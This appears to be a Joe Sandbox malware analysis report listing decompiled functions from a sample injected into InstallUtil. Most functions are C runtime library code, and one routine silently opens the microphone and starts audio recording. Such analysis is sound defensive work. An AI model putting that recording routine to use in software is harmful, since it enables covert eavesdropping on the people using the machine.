                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00438A81,?,00000000,?,00000001,?,?,00000001,00438A81,?), ref: 0044CEEA
                                                                      • __alloca_probe_16.LIBCMT ref: 0044CF22
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044CF73
                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004377DF,?), ref: 0044CF85
                                                                      • __freea.LIBCMT ref: 0044CF8E
                                                                        • Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                      • String ID:
                                                                      • API String ID: 313313983-0
                                                                      • Opcode ID: 50b51c4a191b6d1fe6e0c006c40ae766f54e5027bae194a81e30d446e4e34767
                                                                      • Instruction ID: 507319d0262b13adbb6a0aec4035fc08de50ff3dfea07886d4c571385026ad11
                                                                      • Opcode Fuzzy Hash: 50b51c4a191b6d1fe6e0c006c40ae766f54e5027bae194a81e30d446e4e34767
                                                                      • Instruction Fuzzy Hash: 4B31F032A0120AABEF249F65CC81DAF7BA6EF44314F08416AFC14D6290E73DCD54CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E00401BA9(void* __eflags) {
                                                                      				signed short _t3;
                                                                      				signed int _t7;
                                                                      				signed int _t15;
                                                                      				signed int _t24;
                                                                      				signed int _t25;
                                                                      				void* _t33;
                                                                      				intOrPtr* _t34;
                                                                      				void* _t35;
                                                                      
                                                                      				_t35 = __eflags;
                                                                      				CreateDirectoryW(E00401EC4(0x46e0d8), 0);
                                                                      				_t3 = 8;
                                                                      				 *0x46daa6 = _t3;
                                                                      				 *0x46da9c = 0x1f40;
                                                                      				 *0x46daa0 = 0x1f40;
                                                                      				0x46da98->wFormatTag = 1;
                                                                      				 *0x46da9a = 1;
                                                                      				 *0x46daa4 = 1;
                                                                      				 *0x46daa8 = 0;
                                                                      				_t7 = E004383EC(_t5, E00401F6B(E00401E25(0x46e600, 1, _t33, _t35, 0x24)));
                                                                      				_t24 =  *0x46da9c; // 0x0
                                                                      				 *_t34 = 0x30008;
                                                                      				_t25 = _t24 * _t7 * 0x3c;
                                                                      				 *0x46daac = _t25;
                                                                      				 *0x46dab4 = (( *0x46daa6 & 0x0000ffff) >> 3) * _t25;
                                                                      				waveInOpen(0x46dab0, 0xffffffff, 0x46da98, E00401CCB, 0, ??);
                                                                      				E00401F5D( *0x46dab4);
                                                                      				0x46da78->lpData = E00401F6B(0x46e0f0);
                                                                      				_t15 =  *0x46dab4; // 0x0
                                                                      				 *0x46da7c = _t15;
                                                                      				 *0x46da80 = 0;
                                                                      				 *0x46da84 = 0;
                                                                      				 *0x46da88 = 0;
                                                                      				 *0x46da8c = 0;
                                                                      				waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
                                                                      				waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
                                                                      				waveInStart( *0x46dab0);
                                                                      				return 0;
                                                                      			}
                                                                      0x00401ba9
                                                                      0x00401bb9
                                                                      0x00401bc1
                                                                      0x00401bc7
                                                                      0x00401bcf
                                                                      0x00401bd6
                                                                      0x00401bde
                                                                      0x00401bec
                                                                      0x00401bf3
                                                                      0x00401bfa
                                                                      0x00401c0d
                                                                      0x00401c12
                                                                      0x00401c1b
                                                                      0x00401c2d
                                                                      0x00401c44
                                                                      0x00401c4a
                                                                      0x00401c4f
                                                                      0x00401c62
                                                                      0x00401c75
                                                                      0x00401c7a
                                                                      0x00401c86
                                                                      0x00401c8b
                                                                      0x00401c91
                                                                      0x00401c97
                                                                      0x00401c9d
                                                                      0x00401ca3
                                                                      0x00401cb2
                                                                      0x00401cbe
                                                                      0x00401cc8

                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BB9
                                                                      • waveInOpen.WINMM(0046DAB0,000000FF,0046DA98,Function_00001CCB,00000000,00000000,00000024), ref: 00401C4F
                                                                      • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401CA3
                                                                      • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401CB2
                                                                      • waveInStart.WINMM ref: 00401CBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                      • String ID:
                                                                      • API String ID: 1356121797-0
                                                                      • Opcode ID: 803c58fd5ec0f152acb46d0bcf94c60bbae932a42975322718757f75c1d9126e
                                                                      • Instruction ID: 344ad851c8734cbc447b0f39cf142e8bb944ec66090ee7ce45137a1dd74808b0
                                                                      • Opcode Fuzzy Hash: 803c58fd5ec0f152acb46d0bcf94c60bbae932a42975322718757f75c1d9126e
                                                                      • Instruction Fuzzy Hash: 7F214871F5C2109BC704AFF6AD15A1A7AA9EF99305700543BF509DBAB1FBF844028B4E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0044B0CB() {
                                                                      				int _v8;
                                                                      				void* __ecx;
                                                                      				void* _t6;
                                                                      				int _t7;
                                                                      				char* _t13;
                                                                      				int _t17;
                                                                      				void* _t19;
                                                                      				char* _t25;
                                                                      				WCHAR* _t27;
                                                                      
                                                                      				_t27 = GetEnvironmentStringsW();
                                                                      				if(_t27 == 0) {
                                                                      					L7:
                                                                      					_t13 = 0;
                                                                      				} else {
                                                                      					_t6 = E0044B094(_t27);
                                                                      					_pop(_t19);
                                                                      					_t17 = _t6 - _t27 >> 1;
                                                                      					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                                                                      					_v8 = _t7;
                                                                      					if(_t7 == 0) {
                                                                      						goto L7;
                                                                      					} else {
                                                                      						_t25 = E004421F7(_t19, _t7);
                                                                      						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                                                                      							_t13 = 0;
                                                                      						} else {
                                                                      							_t13 = _t25;
                                                                      							_t25 = 0;
                                                                      						}
                                                                      						E004427C2(_t25);
                                                                      					}
                                                                      				}
                                                                      				if(_t27 != 0) {
                                                                      					FreeEnvironmentStringsW(_t27);
                                                                      				}
                                                                      				return _t13;
                                                                      			}
                                                                      0x0044b0da
                                                                      0x0044b0e0
                                                                      0x0044b138
                                                                      0x0044b138
                                                                      0x0044b0e2
                                                                      0x0044b0e3
                                                                      0x0044b0e8
                                                                      0x0044b0f1
                                                                      0x0044b0f7
                                                                      0x0044b0fd
                                                                      0x0044b102
                                                                      0x00000000
                                                                      0x0044b104
                                                                      0x0044b10a
                                                                      0x0044b10f
                                                                      0x0044b12d
                                                                      0x0044b127
                                                                      0x0044b127
                                                                      0x0044b129
                                                                      0x0044b129
                                                                      0x0044b130
                                                                      0x0044b135
                                                                      0x0044b102
                                                                      0x0044b13c
                                                                      0x0044b13f
                                                                      0x0044b13f
                                                                      0x0044b14d

                                                                      APIs
                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044B0D4
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044B0F7
                                                                        • Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044B11D
                                                                      • _free.LIBCMT ref: 0044B130
                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044B13F
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                      • String ID:
                                                                      • API String ID: 336800556-0
                                                                      • Opcode ID: 53aa8d83d0339acc2514fb8208e7d5ce801016b9814cce6c2346f504b3f2f8cf
                                                                      • Instruction ID: 9d8d00510a03bc05891748290634c4512af5014b8bd0b14bce7efc407fefd574
                                                                      • Opcode Fuzzy Hash: 53aa8d83d0339acc2514fb8208e7d5ce801016b9814cce6c2346f504b3f2f8cf
                                                                      • Instruction Fuzzy Hash: E401B1626027107F33211ABA5C9CC7BBA6CDAC2BE5715012AFA04D6241EF68CD0291F8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E004442D9(void* __ecx) {
                                                                      				void* __esi;
                                                                      				intOrPtr _t2;
                                                                      				void* _t4;
                                                                      				void* _t10;
                                                                      				void* _t11;
                                                                      				void* _t13;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				_t16 = GetLastError();
                                                                      				_t10 = 0;
                                                                      				_t2 =  *0x46c1cc; // 0x6
                                                                      				_t19 = _t2 - 0xffffffff;
                                                                      				if(_t2 == 0xffffffff) {
                                                                      					L2:
                                                                      					_t15 = E00441BB3(_t11, 1, 0x364);
                                                                      					_pop(_t13);
                                                                      					if(_t15 != 0) {
                                                                      						_t4 = E00444852(_t13, _t16, __eflags,  *0x46c1cc, _t15);
                                                                      						__eflags = _t4;
                                                                      						if(_t4 != 0) {
                                                                      							E004440C7(_t13, _t15, 0x46d654);
                                                                      							E004427C2(_t10);
                                                                      							__eflags = _t15;
                                                                      							if(_t15 != 0) {
                                                                      								goto L9;
                                                                      							} else {
                                                                      								goto L8;
                                                                      							}
                                                                      						} else {
                                                                      							_push(_t15);
                                                                      							goto L4;
                                                                      						}
                                                                      					} else {
                                                                      						_push(_t10);
                                                                      						L4:
                                                                      						E004427C2();
                                                                      						L8:
                                                                      						SetLastError(_t16);
                                                                      					}
                                                                      				} else {
                                                                      					_t15 = E004447FC(_t11, _t16, _t19, _t2);
                                                                      					if(_t15 != 0) {
                                                                      						L9:
                                                                      						SetLastError(_t16);
                                                                      						_t10 = _t15;
                                                                      					} else {
                                                                      						goto L2;
                                                                      					}
                                                                      				}
                                                                      				return _t10;
                                                                      			}
                                                                      0x004442d9
                                                                      0x004442e4
                                                                      0x004442e6
                                                                      0x004442e8
                                                                      0x004442ed
                                                                      0x004442f0
                                                                      0x004442fe
                                                                      0x0044430a
                                                                      0x0044430d
                                                                      0x00444310
                                                                      0x00444322
                                                                      0x00444327
                                                                      0x00444329
                                                                      0x00444334
                                                                      0x0044433a
                                                                      0x00444342
                                                                      0x00444344
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044432b
                                                                      0x0044432b
                                                                      0x00000000
                                                                      0x0044432b
                                                                      0x00444312
                                                                      0x00444312
                                                                      0x00444313
                                                                      0x00444313
                                                                      0x00444346
                                                                      0x00444347
                                                                      0x00444347
                                                                      0x004442f2
                                                                      0x004442f8
                                                                      0x004442fc
                                                                      0x0044434f
                                                                      0x00444350
                                                                      0x00444356
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004442fc
                                                                      0x0044435d

                                                                      APIs
                                                                      • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00439946,0043DC1B,00000000,?,?,?,?,0043DDFE,00000000,0000000A,000000FF,0000000A,00000000), ref: 004442DE
                                                                      • _free.LIBCMT ref: 00444313
                                                                      • _free.LIBCMT ref: 0044433A
                                                                      • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00444347
                                                                      • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00444350
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free
                                                                      • String ID:
                                                                      • API String ID: 3170660625-0
                                                                      • Opcode ID: 21cc67832f72140f8428115ceb9f326a0f4a24013c8998ebd3c45c346cdaa388
                                                                      • Instruction ID: 009ada4f88036a76875dba4f910c65447b3cae8e4b97b3a0ee7c4c33a86d7d5c
                                                                      • Opcode Fuzzy Hash: 21cc67832f72140f8428115ceb9f326a0f4a24013c8998ebd3c45c346cdaa388
                                                                      • Instruction Fuzzy Hash: 5301F93630070166F3126A766C86B6B2219DBD2F79735013BF914932A2EFACCC05453D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0044C72D(intOrPtr* _a4) {
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t23;
                                                                      				void* _t24;
                                                                      				void* _t25;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      
                                                                      				_t21 = _a4;
                                                                      				if(_t21 != 0) {
                                                                      					_t23 =  *_t21 -  *0x46c178; // 0x46c170
                                                                      					if(_t23 != 0) {
                                                                      						E004427C2(_t7);
                                                                      					}
                                                                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46c17c; // 0x46d64c
                                                                      					if(_t24 != 0) {
                                                                      						E004427C2(_t8);
                                                                      					}
                                                                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46c180; // 0x46d64c
                                                                      					if(_t25 != 0) {
                                                                      						E004427C2(_t9);
                                                                      					}
                                                                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46c1a8; // 0x46c174
                                                                      					if(_t26 != 0) {
                                                                      						E004427C2(_t10);
                                                                      					}
                                                                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                      					_t27 = _t6 -  *0x46c1ac; // 0x46d650
                                                                      					if(_t27 != 0) {
                                                                      						return E004427C2(_t6);
                                                                      					}
                                                                      				}
                                                                      				return _t6;
                                                                      			}
                                                                      0x0044c733
                                                                      0x0044c738
                                                                      0x0044c73c
                                                                      0x0044c742
                                                                      0x0044c745
                                                                      0x0044c74a
                                                                      0x0044c74e
                                                                      0x0044c754
                                                                      0x0044c757
                                                                      0x0044c75c
                                                                      0x0044c760
                                                                      0x0044c766
                                                                      0x0044c769
                                                                      0x0044c76e
                                                                      0x0044c772
                                                                      0x0044c778
                                                                      0x0044c77b
                                                                      0x0044c780
                                                                      0x0044c781
                                                                      0x0044c784
                                                                      0x0044c78a
                                                                      0x00000000
                                                                      0x0044c792
                                                                      0x0044c78a
                                                                      0x0044c795

                                                                      APIs
                                                                      • _free.LIBCMT ref: 0044C745
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 0044C757
                                                                      • _free.LIBCMT ref: 0044C769
                                                                      • _free.LIBCMT ref: 0044C77B
                                                                      • _free.LIBCMT ref: 0044C78D
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 94ba95edecf047d7489292863a603b2af803abcef43ad176f9a8dafea2bc29a1
                                                                      • Instruction ID: 9f606833b293b4dbbcb7bea4edcaf54fffb6c9e4ae9b3e4aa72faf3428947d7a
                                                                      • Opcode Fuzzy Hash: 94ba95edecf047d7489292863a603b2af803abcef43ad176f9a8dafea2bc29a1
                                                                      • Instruction Fuzzy Hash: 12F036326056016BB660EB7EF9C6C6773D9EA11B107A8881BF144D7612DBB8FC804E7D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E00440127(signed int __ecx) {
                                                                      				intOrPtr _t7;
                                                                      
                                                                      				asm("lock xadd [eax], ecx");
                                                                      				if((__ecx | 0xffffffff) == 0) {
                                                                      					_t7 =  *0x46c990; // 0x11f9910
                                                                      					if(_t7 != 0x46c770) {
                                                                      						E004427C2(_t7);
                                                                      						 *0x46c990 = 0x46c770;
                                                                      					}
                                                                      				}
                                                                      				E004427C2( *0x46da04);
                                                                      				 *0x46da04 = 0;
                                                                      				E004427C2( *0x46da08);
                                                                      				 *0x46da08 = 0;
                                                                      				E004427C2( *0x46da38);
                                                                      				 *0x46da38 = 0;
                                                                      				E004427C2( *0x46da3c);
                                                                      				 *0x46da3c = 0;
                                                                      				return 1;
                                                                      			}
                                                                      0x00440130
                                                                      0x00440134
                                                                      0x00440136
                                                                      0x00440142
                                                                      0x00440145
                                                                      0x0044014b
                                                                      0x0044014b
                                                                      0x00440142
                                                                      0x00440157
                                                                      0x00440164
                                                                      0x0044016a
                                                                      0x00440175
                                                                      0x0044017b
                                                                      0x00440186
                                                                      0x0044018c
                                                                      0x00440194
                                                                      0x0044019d

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00440145
                                                                        • Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
                                                                        • Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA
                                                                      • _free.LIBCMT ref: 00440157
                                                                      • _free.LIBCMT ref: 0044016A
                                                                      • _free.LIBCMT ref: 0044017B
                                                                      • _free.LIBCMT ref: 0044018C
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 804531a0752125b40791fc05ebc8707dcaa48543742418257034efaebae2e7fd
                                                                      • Instruction ID: 90a05c473352b48ec0fd53a4167d4b5db266978a4d34a66110c68907f3b6885f
                                                                      • Opcode Fuzzy Hash: 804531a0752125b40791fc05ebc8707dcaa48543742418257034efaebae2e7fd
                                                                      • Instruction Fuzzy Hash: EEF0BEB0F0D1608BA7026F76BCC24143B21F728B28345512BF52486730EBF948408F9F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                       C-Code - Quality: 93%
                                                                       			// Statically linked UCRT lowio write routine (write_nolock): _a4 = fd, _a8 = buffer, _a12 = byte count.
                                                                       			// Library code, not the sample's own logic. Tells: fd >> 6 and (fd & 0x3f) * 0x30 indexing into the
                                                                       			// handle table at 0x46d800 (__pioinfo), osfile bits 0x20/0x40/0x80 (FAPPEND/FDEV/FTEXT) at entry +0x28,
                                                                       			// text mode 0/1/2 (ANSI/UTF-8/UTF-16LE) at +0x29, and errno values 0x16/0x1c/9 (EINVAL/ENOSPC/EBADF).
                                                                       			E004468E3(void* __ebx, void* __edi, void* __esi, signed int _a4, void* _a8, signed int _a12) {
                                                                      				signed int _v8;
                                                                      				long _v12;
                                                                      				struct _OVERLAPPED* _v16;
                                                                      				long _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				intOrPtr _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				void* _v52;
                                                                      				signed int _t62;
                                                                      				intOrPtr _t66;
                                                                      				signed char _t68;
                                                                      				signed int _t69;
                                                                      				signed int _t71;
                                                                      				signed int _t73;
                                                                      				signed int _t74;
                                                                      				signed int _t77;
                                                                      				intOrPtr _t79;
                                                                      				signed int _t87;
                                                                      				signed int _t90;
                                                                      				signed int _t106;
                                                                      				signed int _t107;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t112;
                                                                      				signed int _t117;
                                                                      				signed int _t119;
                                                                      				void* _t121;
                                                                      				signed int _t124;
                                                                      				signed int _t126;
                                                                      				signed int _t128;
                                                                      				void* _t129;
                                                                      
                                                                       				_t62 =  *0x46c00c; // 0xe1ce05e9, __security_cookie (/GS stack protector)
                                                                       				_v8 = _t62 ^ _t128; // cookie ^ ebp, checked again in the epilogue
                                                                      				_t110 = _a12;
                                                                      				_v12 = _t110;
                                                                      				_t124 = _a4;
                                                                      				_t121 = _a8;
                                                                      				_v52 = _t121;
                                                                      				if(_t110 != 0) {
                                                                      					__eflags = _t121;
                                                                      					if(_t121 != 0) {
                                                                      						_push(__ebx);
                                                                       						_t106 = _t124 >> 6; // fd >> 6: which __pioinfo block (64 entries per block)
                                                                       						_t119 = (_t124 & 0x0000003f) * 0x30; // (fd & 0x3f) * sizeof(ioinfo): entry offset, 0x30 bytes on x86
                                                                       						_v32 = _t106;
                                                                       						_t66 =  *((intOrPtr*)(0x46d800 + _t106 * 4)); // __pioinfo[block]
                                                                       						_v48 = _t66;
                                                                       						_v28 = _t119;
                                                                       						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29)); // entry->textmode: 0 = ANSI, 1 = UTF-8, 2 = UTF-16LE
                                                                       						__eflags = _t107 - 2;
                                                                       						if(_t107 == 2) { // UTF-16LE (and, via L6, UTF-8): the byte count must be even
                                                                       							L6:
                                                                       							_t68 =  !_t110; // ~size
                                                                       							__eflags = _t68 & 0x00000001;
                                                                       							if((_t68 & 0x00000001) != 0) { // size is even: go on to the write
                                                                      								_t66 = _v48;
                                                                      								L9:
                                                                       								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020; // entry->osfile & FAPPEND
                                                                       								if(__eflags != 0) {
                                                                       									E00447364(_t124, 0, 0, 2); // _lseeki64_nolock(fd, 0, SEEK_END): append mode seeks to the end first
                                                                       									_t129 = _t129 + 0x10;
                                                                       								}
                                                                       								_t69 = E00446488(_t107, _t119, __eflags, _t124); // console check on fd (the _isatty pattern; only _t124 is a real argument)
                                                                       								__eflags = _t69;
                                                                       								if(_t69 == 0) { // not a console
                                                                       									_t112 =  *((intOrPtr*)(0x46d800 + _v32 * 4));
                                                                       									_t71 = _v28;
                                                                       									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080; // entry->osfile & FTEXT
                                                                       									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) { // binary mode: no translation, a single WriteFile
                                                                       										_v24 = 0; // write_result built inline: _v24 = error code, _v20 = bytes written
                                                                       										_v20 = 0;
                                                                       										_v16 = 0;
                                                                       										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0); // entry->osfhnd at +0x18
                                                                       										__eflags = _t73;
                                                                       										if(_t73 == 0) {
                                                                       											_v24 = GetLastError(); // OS error code for the mapping below
                                                                      										}
                                                                      										goto L28;
                                                                      									}
                                                                       									_t87 = _t107; // text mode on a file: dispatch on entry->textmode; each writer gets (&result, fd, buffer, size)
                                                                       									__eflags = _t87;
                                                                       									if(_t87 == 0) { // 0: ANSI text writer (LF -> CRLF)
                                                                       										_t38 =  &_v24; // 0x452a45
                                                                       										E004464FE(_t107, _t121, _t124, _t38, _t124, _t121, _v12);
                                                                       										goto L17;
                                                                       									}
                                                                       									_t90 = _t87 - 1;
                                                                       									__eflags = _t90;
                                                                       									if(_t90 == 0) { // 1: UTF-8 text writer
                                                                       										_t36 =  &_v24; // 0x452a45
                                                                       										_t89 = E004466CB(_t107, _t121, _t124, _t36, _t124, _t121, _v12);
                                                                       										goto L17;
                                                                       									}
                                                                       									__eflags = _t90 != 1;
                                                                       									if(_t90 != 1) { // any other mode: handled as "nothing written"
                                                                       										goto L34;
                                                                       									}
                                                                       									_t34 =  &_v24; // 0x452a45
                                                                       									_t89 = E004465DD(_t107, _t121, _t124, _t34, _t124, _t121, _v12); // 2: UTF-16LE text writer
                                                                       									goto L17;
                                                                      								} else {
                                                                       									__eflags = _t107;
                                                                       									if(_t107 == 0) { // console, ANSI: double-translated console writer (needs fd, unlike the Unicode one)
                                                                       										_t24 =  &_v24; // 0x452a45
                                                                       										_t89 = E00446268(_t107, _t121, _t124, _t24, _t124, _t121, _v12);
                                                                      										L17:
                                                                      										L15:
                                                                      										L28:
                                                                       										asm("movsd"); // copy the 12-byte write_result { error_code, char_count, lowio_count }
                                                                       										asm("movsd"); // from _v24.._v16 into _v44.._v36
                                                                       										asm("movsd");
                                                                       										_t74 = _v40; // char_count
                                                                       										__eflags = _t74;
                                                                       										if(_t74 != 0) { // something was written: return a count (the exact expression was lost by the decompiler; only the compare with _v36 survives)
                                                                       											__eflags = _t74 - _v36;
                                                                       											L40:
                                                                       											L41:
                                                                       											return E004318FB(_v8 ^ _t128); // __security_check_cookie, then return
                                                                      										}
                                                                       										_t77 = _v44; // error_code
                                                                       										__eflags = _t77;
                                                                       										if(_t77 == 0) { // nothing written and no OS error
                                                                       											_t121 = _v52;
                                                                       											L34:
                                                                       											_t117 = _v28;
                                                                       											_t79 =  *((intOrPtr*)(0x46d800 + _v32 * 4));
                                                                       											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040; // entry->osfile & FDEV
                                                                       											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) { // not a device: report disk full
                                                                       												L37:
                                                                       												 *((intOrPtr*)(E00439941())) = 0x1c; // errno = ENOSPC
                                                                       												_t81 = E0043992E(); // _doserrno = 0
                                                                       												 *_t81 =  *_t81 & 0x00000000;
                                                                       												__eflags =  *_t81;
                                                                      												L38:
                                                                      												goto L40;
                                                                      											}
                                                                       											__eflags =  *_t121 - 0x1a;
                                                                       											if( *_t121 != 0x1a) { // device, but the first byte is not ^Z: still ENOSPC
                                                                       												goto L37;
                                                                       											}
                                                                       											goto L40; // ^Z to a device: success with nothing written, no errno
                                                                      										}
                                                                       										_t126 = 5; // ERROR_ACCESS_DENIED
                                                                       										__eflags = _t77 - _t126;
                                                                       										if(_t77 != _t126) {
                                                                       											_t81 = E0043990B(_t77); // __acrt_errno_map_os_error(error_code)
                                                                       										} else {
                                                                       											 *((intOrPtr*)(E00439941())) = 9; // errno = EBADF
                                                                       											 *(E0043992E()) = _t126; // _doserrno = ERROR_ACCESS_DENIED
                                                                       										}
                                                                      										goto L38;
                                                                      									}
                                                                       									__eflags = _t107 - 1 - 1;
                                                                       									if(_t107 - 1 > 1) { // console with an unknown text mode: handled as "nothing written"
                                                                       										goto L34;
                                                                       									}
                                                                       									_t22 =  &_v24; // 0x452a45
                                                                       									E0044641B(_t22, _t121, _v12); // console, UTF-8/UTF-16LE: double-translated Unicode writer (&result, buffer, size)
                                                                      									goto L15;
                                                                      								}
                                                                      							}
                                                                       							 *(E0043992E()) =  *_t97 & 0x00000000; // odd byte count in a UTF mode: _doserrno = 0 (_t97 is the decompiler's name for the returned pointer)
                                                                       							 *((intOrPtr*)(E00439941())) = 0x16; // errno = EINVAL
                                                                       							_t81 = E0043862C(); // _invalid_parameter_noinfo()
                                                                       							goto L38;
                                                                      						}
                                                                      						__eflags = _t107 - 1;
                                                                      						if(_t107 != 1) {
                                                                      							goto L9;
                                                                      						}
                                                                      						goto L6;
                                                                      					}
                                                                       					 *(E0043992E()) =  *_t99 & _t121; // buffer == NULL (_t121 is 0 on this path): _doserrno = 0
                                                                       					 *((intOrPtr*)(E00439941())) = 0x16; // errno = EINVAL
                                                                       					E0043862C(); // _invalid_parameter_noinfo()
                                                                       					goto L41;
                                                                      				}
                                                                      				goto L41;
                                                                      			}

                                                                       Instruction addresses for the listing above, one per statement in listing order (0x00000000 marks a label or goto with no code of its own):
                                                                       0x004468eb
                                                                      0x004468f2
                                                                      0x004468f5
                                                                      0x004468f8
                                                                      0x004468fc
                                                                      0x00446900
                                                                      0x00446903
                                                                      0x00446908
                                                                      0x00446911
                                                                      0x00446913
                                                                      0x00446934
                                                                      0x00446939
                                                                      0x0044693f
                                                                      0x00446942
                                                                      0x00446945
                                                                      0x0044694c
                                                                      0x0044694f
                                                                      0x00446952
                                                                      0x00446956
                                                                      0x00446959
                                                                      0x00446960
                                                                      0x00446962
                                                                      0x00446964
                                                                      0x00446966
                                                                      0x00446985
                                                                      0x00446988
                                                                      0x00446988
                                                                      0x0044698d
                                                                      0x00446996
                                                                      0x0044699b
                                                                      0x0044699b
                                                                      0x0044699f
                                                                      0x004469a5
